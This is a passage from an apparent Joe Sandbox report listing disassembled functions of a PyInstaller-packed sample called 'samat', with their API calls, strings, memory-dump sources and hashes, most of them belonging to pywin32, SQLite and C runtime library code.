Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
Instruction Fuzzy Hash: 7A21B262B08B4182E711AB14F8467EAB3A8FB88780F804137EE8D97759DF7CD215C751

Function 00007FF7E12C2710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF7E12C1B99), ref: 00007FF7E12C2760

Strings

Error, xrefs: 00007FF7E12C27DE
ERROR, xrefs: 00007FF7E12C276F
Error [ANSI Fallback], xrefs: 00007FF7E12C27CF
[PYI-%d:%s] , xrefs: 00007FF7E12C2768

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CurrentProcess
String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-1591803126
Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
Instruction ID: f0cc6981874ae1e4e83bbbda7f8231ba2ce14cdd7852a331e847ba866ec1225f
Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
Instruction Fuzzy Hash: 97217F72B1878182E721AB51B8827EAA298BB88384F804137FE8D93659DFBCD155C751

Function 00007FF8B7E87DE0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 59COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E87E0A
InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF8B7E87E2E

Strings

InitializeSecurityDescriptor, xrefs: 00007FF8B7E87E3A
:Initialize, xrefs: 00007FF8B7E87DF9

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_DescriptorInitializeParseSecurityTuple
String ID: :Initialize$InitializeSecurityDescriptor
API String ID: 3008588735-475701968
Opcode ID: bcb71fab1ef2345fa760387ba95d939ceb0289144ad845e36b1c36082859699f
Instruction ID: afe1938795dc9d6076904039ebe5a961cb6a5f7f06c3a0dc283b2dd61493587a
Opcode Fuzzy Hash: bcb71fab1ef2345fa760387ba95d939ceb0289144ad845e36b1c36082859699f
Instruction Fuzzy Hash: 36210022B1874182FB548B6AA54027E63A1EF49FC4F985035EB5D97B69DF3CE8518700

Function 00007FF8B7E855D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00007FF8B7E856A7
PyUnicode_FromWideChar.PYTHON313 ref: 00007FF8B7E856CF
PyObject_Print.PYTHON313 ref: 00007FF8B7E856E4
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E856F8

Strings

<%hs at %Id (%Id)>, xrefs: 00007FF8B7E8568F

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: CharDeallocFromObject_PrintUnicode_Widewsprintf
String ID: <%hs at %Id (%Id)>
API String ID: 2754229576-3200932714
Opcode ID: d6e00180c53ce781e79f886e838ef22ec9f51abfd2b976ddd751f53c605734fa
Instruction ID: a53bf859c432f04680085164e6232bea6edb4b510b70311481ac3bde0a5a3ca9
Opcode Fuzzy Hash: d6e00180c53ce781e79f886e838ef22ec9f51abfd2b976ddd751f53c605734fa
Instruction Fuzzy Hash: B5117963B19B8991EB508B69E8047AD63A0EF88FE4F844231DA1E437B5EE3CD449C700

Function 00007FF8B7E85980 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E859A5
_Py_NewReference.PYTHON313 ref: 00007FF8B7E85A34

Strings

The object is not a PyHANDLE object, xrefs: 00007FF8B7E859E9
|O:HANDLERegistry, xrefs: 00007FF8B7E8599E

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_ParseReferenceTuple
String ID: The object is not a PyHANDLE object$|O:HANDLERegistry
API String ID: 709158290-3143913545
Opcode ID: c51ad50cdd8a4e81500241ab1d12deaa1fc53d1bb5ae0f20817fe087472034bc
Instruction ID: d97a171480159607a8cbbe4d8e079294ed682b53e7d306967963930312a7559c
Opcode Fuzzy Hash: c51ad50cdd8a4e81500241ab1d12deaa1fc53d1bb5ae0f20817fe087472034bc
Instruction Fuzzy Hash: CA210A22A18B42D1EB408B59F58006D6374FF84BC4F945032EB4D47675EF3CE9A5C740

Function 00007FF8B7E85080 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E850A5
_Py_NewReference.PYTHON313 ref: 00007FF8B7E85134

Strings

The object is not a PyHANDLE object, xrefs: 00007FF8B7E850E9
|O:HANDLE, xrefs: 00007FF8B7E8509E

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_ParseReferenceTuple
String ID: The object is not a PyHANDLE object$|O:HANDLE
API String ID: 709158290-2911939918
Opcode ID: d524b3afff0263af5fd17325481d8d0d46617f7d59757ba0433345372724a13d
Instruction ID: a12b243bb34611a41ab977e9e93ca7a0b50badfa978ca5e379cae3ecf5ccbd9e
Opcode Fuzzy Hash: d524b3afff0263af5fd17325481d8d0d46617f7d59757ba0433345372724a13d
Instruction Fuzzy Hash: AF21E922A18B4292EB509B59F88007D63B4FF84BC4F945032EB4E47675EF3DE9A5C780

Function 00007FF8B7E8C9C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51timeCOMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E8C9E7
DosDateTimeToFileTime.KERNEL32 ref: 00007FF8B7E8CA14

Strings

DosDateTimeToFileTime, xrefs: 00007FF8B7E8CA20
FileTimeToSystemTime, xrefs: 00007FF8B7E8CA54

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Time$Arg_DateFileParseTuple
String ID: DosDateTimeToFileTime$FileTimeToSystemTime
API String ID: 1545533762-3006328108
Opcode ID: 6a8d318ddad729e7252b3c6980ed207a389d14d8fbb48f996d8d5cf78618f2e3
Instruction ID: 653323b398d754e7b3e1e763c7de489ed1b47b77ab512678a0cde37479a0cf60
Opcode Fuzzy Hash: 6a8d318ddad729e7252b3c6980ed207a389d14d8fbb48f996d8d5cf78618f2e3
Instruction Fuzzy Hash: 76113352A08A4291FA90EB69E8521BE73A1FFC5FC8FC40072E74E465B6EE3CD5058B00

Function 00007FF8B7E81990 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140 ref: 00007FF8B7E819D4
realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E819E6
PyErr_Format.PYTHON313 ref: 00007FF8B7E81A0D

Strings

SetACL: Unable to reallocate ACL to size %d, xrefs: 00007FF8B7E819FC

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_Formatmemcpyrealloc
String ID: SetACL: Unable to reallocate ACL to size %d
API String ID: 2667793433-1849531889
Opcode ID: 6ba060cef578a0feeb06df177a6597eb8244b50008ebb1effcf474d1aa7c220c
Instruction ID: 14741341ec8dcf2588e9ea289d47096603d912919dcf90284228e4a428dd6bf4
Opcode Fuzzy Hash: 6ba060cef578a0feeb06df177a6597eb8244b50008ebb1effcf474d1aa7c220c
Instruction Fuzzy Hash: 9F110A66B19B5182EA149B5AE84507EB3A0FF48FC0F448439EB5D4BB66DF3CE4918344

Function 00007FF8B7E84DD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON313 ref: 00007FF8B7E84E16
PyErr_SetString.PYTHON313 ref: 00007FF8B7E84E47

Strings

Object must be a PyDEVMODEW, xrefs: 00007FF8B7E84E3D
PyDEVMODE cannot be None in this context, xrefs: 00007FF8B7E84E0C

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_String
String ID: Object must be a PyDEVMODEW$PyDEVMODE cannot be None in this context
API String ID: 1450464846-2899910425
Opcode ID: 3c20b954deb9a9200817a31d63ae06041e07210914048fb5353322c95aff8119
Instruction ID: 8445c8d3681addd9ba2868a00c8f532dfc382d4983b341cbe9fc9248172d3bfe
Opcode Fuzzy Hash: 3c20b954deb9a9200817a31d63ae06041e07210914048fb5353322c95aff8119
Instruction Fuzzy Hash: 9811E962B18B0681EB548F5DE88026C6360FF88FC8F985031EB1D8A775EE3DD4958700

Function 00007FF8B7E89350 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E89370
GetSidSubAuthorityCount.ADVAPI32 ref: 00007FF8B7E89385
GetSidSubAuthority.ADVAPI32 ref: 00007FF8B7E8939A
PyErr_SetString.PYTHON313 ref: 00007FF8B7E893D4

Strings

The index is out of range, xrefs: 00007FF8B7E893CA

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Authority$Arg_CountErr_ParseStringTuple
String ID: The index is out of range
API String ID: 706982848-505141048
Opcode ID: d87ec0b1fcf0a1068b55480798adcdb78cb2436f0da94cff30977aef3b577662
Instruction ID: 493488e385ac78a42039db16f911485ebe10a627d55657f4838a173c002b9dce
Opcode Fuzzy Hash: d87ec0b1fcf0a1068b55480798adcdb78cb2436f0da94cff30977aef3b577662
Instruction Fuzzy Hash: 0711D672A1974282EB058B59E85056D3360FF88F85F445036EA5D47365DE3CE495C740

Function 00007FF8B7E8D0E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

PyLong_AsVoidPtr.PYTHON313 ref: 00007FF8B7E8D0F5
PyErr_Occurred.PYTHON313 ref: 00007FF8B7E8D103
PyErr_Clear.PYTHON313 ref: 00007FF8B7E8D10E

Part of subcall function 00007FF8B7E8CEB0: PyNumber_Long.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEC5
Part of subcall function 00007FF8B7E8CEB0: PyErr_Occurred.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CED3
Part of subcall function 00007FF8B7E8CEB0: PyLong_AsLongLong.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEE1
Part of subcall function 00007FF8B7E8CEB0: PyErr_Occurred.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEF0
Part of subcall function 00007FF8B7E8CEB0: PyErr_Clear.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEFB
Part of subcall function 00007FF8B7E8CEB0: PyLong_AsUnsignedLongLong.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF04
Part of subcall function 00007FF8B7E8CEB0: PyErr_Occurred.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF13
Part of subcall function 00007FF8B7E8CEB0: _Py_Dealloc.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF2C
Part of subcall function 00007FF8B7E8CEB0: PyErr_Format.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF4B

PyErr_Format.PYTHON313 ref: 00007FF8B7E8D13C

Strings

WPARAM is simple, so must be an int object (got %s), xrefs: 00007FF8B7E8D127

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_$Long$Occurred$Long_$ClearFormat$DeallocNumber_UnsignedVoid
String ID: WPARAM is simple, so must be an int object (got %s)
API String ID: 4021378859-3057595559
Opcode ID: 650d8dcc8cadc460fa6b0e6a961d0bec92543f936dcd9b3b363ec97f9a6b6c7e
Instruction ID: dc39007608968ecd759f38e15c7ffa31d5cdffc18d4c5136e05a6449149634b0
Opcode Fuzzy Hash: 650d8dcc8cadc460fa6b0e6a961d0bec92543f936dcd9b3b363ec97f9a6b6c7e
Instruction Fuzzy Hash: BE011E22A19B8281EB508BAAF44416D6360FF48FC8F485036EF5E57765DE3CE495C700

Function 00007FF8B7E8D660 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

PyLong_FromLongLong.PYTHON313 ref: 00007FF8B7E8D676
PyLong_FromLongLong.PYTHON313 ref: 00007FF8B7E8D683
PyLong_FromLongLong.PYTHON313 ref: 00007FF8B7E8D68F
Py_BuildValue.PYTHON313 ref: 00007FF8B7E8D6C0

Strings

NiNNi(ii), xrefs: 00007FF8B7E8D6B4

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Long$FromLong_$BuildValue
String ID: NiNNi(ii)
API String ID: 3269351011-1588869203
Opcode ID: 395cab98014d2c388113e4450b3a3dd1ebaa526a5b2c7052f1148e00d7086c69
Instruction ID: 673b3b0d330b0a794ed4989a229d39d41415987de98e9ae44b8192b1c9335cfc
Opcode Fuzzy Hash: 395cab98014d2c388113e4450b3a3dd1ebaa526a5b2c7052f1148e00d7086c69
Instruction Fuzzy Hash: 72017276A08B4187DB24CF96F48446AB7A1FB8CBE0B144125EB9E43B68DF3CE4458B00

Function 00007FF7E12D9A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF7E12D9AAD
GetProcAddress.KERNEL32 ref: 00007FF7E12D9AC3
FreeLibrary.KERNEL32 ref: 00007FF7E12D9AEA

Strings

CorExitProcess, xrefs: 00007FF7E12D9ABC
mscoree.dll, xrefs: 00007FF7E12D9AA4

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
Instruction ID: c812952b3c9c5f1efef9bf35d97d970c124134a5925a48ec373d531ee2ef18c3
Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
Instruction Fuzzy Hash: A9F0682270970681EF15AB24EC563759328FF49761F944237D57E451E4DFBDD044C322

Function 00007FF8B8007970 Relevance: 7.8, APIs: 2, Strings: 3, Instructions: 311COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF8B8007A8A
memset.VCRUNTIME140 ref: 00007FF8B8007C1D

Strings

database corruption, xrefs: 00007FF8B8007DCC
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FF8B8007DBF
%s at line %d of [%.10s], xrefs: 00007FF8B8007DD8

Memory Dump Source

Source File: 00000008.00000002.4573442954.00007FF8B7FE1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8B7FE0000, based on PE: true

Associated: 00000008.00000002.4573369201.00007FF8B7FE0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573730405.00007FF8B8143000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573844736.00007FF8B8148000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7fe0000_samat.jbxd

Similarity

API ID: memset
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 2221118986-3727861699
Opcode ID: a8a18ab51c0ace33371640f700a6781e50acd9c5c690dac03b5a74432ef410f9
Instruction ID: 4f26c9a5e5b878cbdb69dd526fd7bd06eab50859aa4996643f0efb09bd35af9e
Opcode Fuzzy Hash: a8a18ab51c0ace33371640f700a6781e50acd9c5c690dac03b5a74432ef410f9
Instruction Fuzzy Hash: FAD17A72609A8AC6DB64CF29D4046AA77A5FB88BC8F158036DF4D477A5EF39D843C304

Function 00007FF8B80089A0 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 192COMMON

Download Yara Rule

Strings

database corruption, xrefs: 00007FF8B8008A5F
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FF8B8008A4C
%s at line %d of [%.10s], xrefs: 00007FF8B8008A66

Memory Dump Source

Source File: 00000008.00000002.4573442954.00007FF8B7FE1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8B7FE0000, based on PE: true

Associated: 00000008.00000002.4573369201.00007FF8B7FE0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573730405.00007FF8B8143000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573844736.00007FF8B8148000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7fe0000_samat.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 0-3727861699
Opcode ID: 5e912ee1f7678e77240253c0303bb73c2f618f6b1c89537da6c189cf6ac1dde9
Instruction ID: 196b3da1b37173549a684472304b3979b73a3f82f1817b3a07d474e0cc81454e
Opcode Fuzzy Hash: 5e912ee1f7678e77240253c0303bb73c2f618f6b1c89537da6c189cf6ac1dde9
Instruction Fuzzy Hash: 7581E562A0C6D58AEB548B29D5846BE7BA0FB417C4F044132DF8D476A1CF3CE497C744

Function 00007FF8B7E87D20 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B7E81931), ref: 00007FF8B7E87D3B
GetSecurityDescriptorLength.ADVAPI32(?,?,?,00007FF8B7E81931), ref: 00007FF8B7E87D44
GetSecurityDescriptorControl.ADVAPI32(?,?,?,00007FF8B7E81931), ref: 00007FF8B7E87D73
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B7E81931), ref: 00007FF8B7E87D8C
memcpy.VCRUNTIME140(?,?,?,00007FF8B7E81931), ref: 00007FF8B7E87D9F

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: DescriptorSecurity$ControlLengthfreemallocmemcpy
String ID:
API String ID: 3383347431-0
Opcode ID: 00db8a8ef03e6ccfc7907ca2be9497b938e4a031f4901367d256bfa0d2a9a409
Instruction ID: 4ac2cb198127315ba41a6c97ccaaec2d3a1a6c0b03684e6d1e4055c165ea14d5
Opcode Fuzzy Hash: 00db8a8ef03e6ccfc7907ca2be9497b938e4a031f4901367d256bfa0d2a9a409
Instruction Fuzzy Hash: 7D117F22708B4182FB049BAEE9401FD5264EF8AFD4F480135EF0D46BA5DF3CD9958700

Function 00007FF8B7E88BE0 Relevance: 7.6, APIs: 5, Instructions: 57COMMON

Download Yara Rule

APIs

_Py_NewReference.PYTHON313(?,?,?,00007FF8B7E8715D,?,?,?,00007FF8B7E86F53), ref: 00007FF8B7E88BFD
GetSecurityDescriptorLength.ADVAPI32(?,?,?,00007FF8B7E8715D,?,?,?,00007FF8B7E86F53), ref: 00007FF8B7E88C0E
GetSecurityDescriptorControl.ADVAPI32(?,?,?,00007FF8B7E8715D,?,?,?,00007FF8B7E86F53), ref: 00007FF8B7E88C3F
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B7E8715D,?,?,?,00007FF8B7E86F53), ref: 00007FF8B7E88C58
memcpy.VCRUNTIME140(?,?,?,00007FF8B7E8715D,?,?,?,00007FF8B7E86F53), ref: 00007FF8B7E88C6B

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: DescriptorSecurity$ControlLengthReferencemallocmemcpy
String ID:
API String ID: 3412238872-0
Opcode ID: c15fc75f51fb05eaa94f12650e5f0670c83e32bb2e77d43decb978ab075af439
Instruction ID: 90fa96618d65736e0fa48052f1ed825b047232e4f9594a4606110c54deacbd88
Opcode Fuzzy Hash: c15fc75f51fb05eaa94f12650e5f0670c83e32bb2e77d43decb978ab075af439
Instruction Fuzzy Hash: 76114922B08B4196FB449BAEA9003A96264EF84FD5F480035DF4C03BA5EF7CE5A5C750

Function 00007FF7E12E9368 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF7E12E9390
